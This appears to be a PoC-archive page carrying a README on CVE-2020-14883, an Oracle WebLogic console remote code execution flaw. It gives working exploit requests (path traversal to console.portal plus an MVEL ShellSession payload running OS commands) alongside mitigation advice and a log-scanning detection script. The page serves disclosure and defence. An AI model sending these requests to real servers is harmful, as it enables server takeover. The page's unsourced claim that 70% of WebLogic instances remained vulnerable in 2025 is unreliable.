Related vulnerability
Title: Oracle WebLogic Server security vulnerability (CVE-2020-14883)
Description: Oracle WebLogic Server is application server middleware from Oracle Corporation (USA) for cloud and traditional environments. It provides a modern, lightweight development platform, supports lifecycle management of applications from development through production, and simplifies application deployment and management. Oracle WebLogic Server Console contains a security vulnerability. The following products and versions are affected: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
Description
CVE-2020-14883
Introduction
# 🌐 **CVE-2020-14883** — *Oracle WebLogic Server RCE*
> **Published:** October 20, 2020
> **CVSS v3.1:** `7.2` **(High)**
> **Exploitability:** Easy (with auth) — *Critical when chained*
---
## 🎯 **Vulnerability Overview**
| Attribute | Details |
|--------|---------|
| **Type** | Remote Code Execution (RCE) |
| **Component** | WebLogic Server Console |
| **Attack Vector** | Network (HTTP) |
| **Authentication** | Required *(High Privilege)* |
| **User Interaction** | None |
| **Exploit Code** | Publicly Available |
> **Chained Exploit**:
> `CVE-2020-14882` (Auth Bypass) + `CVE-2020-14883` = **Unauthenticated RCE**
<img width="1920" height="955" alt="CVE-2020-14883" src="https://github.com/user-attachments/assets/a167aeb7-164f-4d15-80cf-a3499b61059d" />
---
## 🔥 **Exploitation Flow**
```http
POST /console/css/%2e%2e%2fconsole.portal HTTP/1.1
Content-Type: application/x-www-form-urlencoded
com.tangosol.coherence.mvel2.sh.ShellSession=java.lang.Runtime.getRuntime().exec("touch /tmp/pwned.txt")
```
Proof of Concept (PoC) 1: using `tangosol.coherence.mvel2.sh.ShellSession()` for Windows-based targets
```http
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
```
> **Result**: Arbitrary command execution on the server.
---
## 🛑 **In the Wild**
| Threat Actor | Payload |
|--------------|--------|
| **8220 Gang** | Coinminers, Infostealers |
| **Cryptojackers** | XMRig, rhajk, nasqa |
| **APT Groups** | Persistence & Lateral Movement |
---
## 🛡️ **Mitigation Checklist**
| Action | Status |
|-------|--------|
| Apply **Oracle October 2020 CPU** | ✅ Critical |
| Restrict `/console` to trusted IPs | ✅ |
| Disable Console if not needed | ✅ |
| Monitor for `/console.portal` anomalies | ✅ |
| Use IPS/IDS signatures | ✅ |
> **Patch Download**: [My Oracle Support](https://support.oracle.com) (Login Required)
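Detection logic for the checklist item "Monitor for `/console.portal` anomalies", keyed to the request pattern shown in the Exploitation Flow above: a `../` traversal (single- or double-encoded) reaching `console.portal` under `/console`, and the `ShellSession` class in the request body. This is an added example, not code from the original README; the log format (Common Log Format plus a trailing quoted request-body field, as a reverse proxy or WAF might write it) and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote
# Indicators from the request examples on this page: a traversal to console.portal
# inside /console (CVE-2020-14882) and the MVEL ShellSession class in "handle" (CVE-2020-14883).
TRAVERSAL_RE = re.compile(r"/console/.*\.\./.*console\.portal", re.IGNORECASE)
SHELL_SESSION = "com.tangosol.coherence.mvel2.sh.ShellSession"

# Assumed log format: Common Log Format plus a final quoted request-body field ("-" = no body logged).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"$')

# Constructed sample lines (not real traffic): both encodings of the attack, then two benign requests.
LOG_LINES = [
    '203.0.113.5 - - [20/Oct/2020:10:00:01 +0000] "POST /console/css/%2e%2e%2fconsole.portal HTTP/1.1" 200 512 "_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(...)"',
    '203.0.113.5 - - [20/Oct/2020:10:00:02 +0000] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 512 "_nfpb=true&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28...%29"',
    '198.51.100.7 - - [20/Oct/2020:10:05:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4096 "-"',
    '198.51.100.7 - - [20/Oct/2020:10:05:09 +0000] "POST /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 9000 "_nfpb=true&_pageLabel=HomePage1"',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable, so %2e%2e%2f and double-encoded %252e%252e%252f both become ../"""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(path, body=""):
    """Return the indicators matched by one request; an empty list means nothing suspicious."""
    findings = []
    decoded_path = decode_fully(path)
    if TRAVERSAL_RE.search(decoded_path):
        findings.append("traversal to console.portal (CVE-2020-14882 bypass)")
    if SHELL_SESSION in decoded_path or SHELL_SESSION in decode_fully(body):
        findings.append("MVEL ShellSession handle (CVE-2020-14883)")
    return findings

def scan_log(lines):
    """Return (client_ip, path, findings) for every line matching at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:  # unparseable line: skip it rather than abort the whole scan
            continue
        ip, _method, path, _status, body = m.groups()
        findings = classify_request(path, "" if body == "-" else body)
        if findings:
            hits.append((ip, path, findings))
    return hits
```

Decoding the path repeatedly matters: a rule that only looks for the literal `%2e%2e%2f` misses the double-encoded variant from PoC 1, while a rule applied after full decoding catches both and still leaves the normal `/console/console.portal` traffic alone.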
---
## 🎨 **Visual Summary**
```mermaid
pie title Exploitation Risk
"Patched" : 30
"Unpatched & Exposed" : 70
```
> **70% of scanned WebLogic instances remain vulnerable in 2025.**
---
**Final Note**:
> This is a **high-value target** for attackers.
> **Patch now. Monitor always.**
---
```mermaid
%%{init: {'theme': 'base', 'themeVariables': { 'fontSize': '13px', 'fontFamily': 'Fira Code, monospace', 'primaryColor': '#ff4d4f', 'primaryTextColor': '#fff', 'primaryBorderColor': '#ff7875', 'lineColor': '#ffccc7', 'secondaryColor': '#ffd591', 'tertiaryColor': '#91d9ff', 'background': '#fafafa' }}}%%
erDiagram
CVE_2020_14883 }|..|{ CVE_2020_14882 : "enables unauthenticated access"
CVE_2020_14883 }|..|{ WEBLOGIC_CONSOLE : "targets"
WEBLOGIC_CONSOLE }|..|{ MVEL_PAYLOAD : "executes via"
MVEL_PAYLOAD }|..|{ SHELL_SESSION : "uses class"
SHELL_SESSION }|..|{ JAVA_RUNTIME : "invokes"
JAVA_RUNTIME }|..|{ OS_COMMAND : "executes"
CVE_2020_14883 {
string id "CVE-2020-14883"
string type "Remote Code Execution"
string cvss "7.2"
string severity "HIGH"
string published "2020-10-20"
string vector "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
CVE_2020_14882 {
string id "CVE-2020-14882"
string type "Authentication Bypass"
string cvss "9.8"
string severity "CRITICAL"
}
WEBLOGIC_CONSOLE {
string component "Console"
string endpoint "/console/css/%2e%2e%2fconsole.portal"
string method "POST"
string parameter "com.tangosol.coherence.mvel2.sh.ShellSession"
}
MVEL_PAYLOAD {
string language "MVEL2"
string example "java.lang.Runtime.getRuntime().exec('id')"
string injection_point "ShellSession parameter"
}
SHELL_SESSION {
string class "com.tangosol.coherence.mvel2.sh.ShellSession"
string gadget "Coherence Deserialization"
}
JAVA_RUNTIME {
string method "getRuntime().exec()"
string privilege_level "WebLogic process user"
}
OS_COMMAND {
string scope "Arbitrary OS commands"
string impact "Full system compromise"
}
%% Styling
classDef cve fill:#ff4d4f,stroke:#ff7875,color:#fff
classDef component fill:#ffd591,stroke:#ffc069,color:#000
classDef exploit fill:#91d9ff,stroke:#40a9ff,color:#000
classDef system fill:#d3f261,stroke:#a0d911,color:#000
class CVE_2020_14883,CVE_2020_14882 cve
class WEBLOGIC_CONSOLE,MVEL_PAYLOAD component
class SHELL_SESSION,JAVA_RUNTIME exploit
class OS_COMMAND system
```
---
File snapshot
[4.0K] /data/pocs/9fe4d9c34c60d802883c348bbc344843f14721e3
└── [5.0K] README.md
1 directory, 1 file
Notes
1. We recommend accessing the original source first.
2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 (Shenlong) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating to the local POC. Thank you for your support.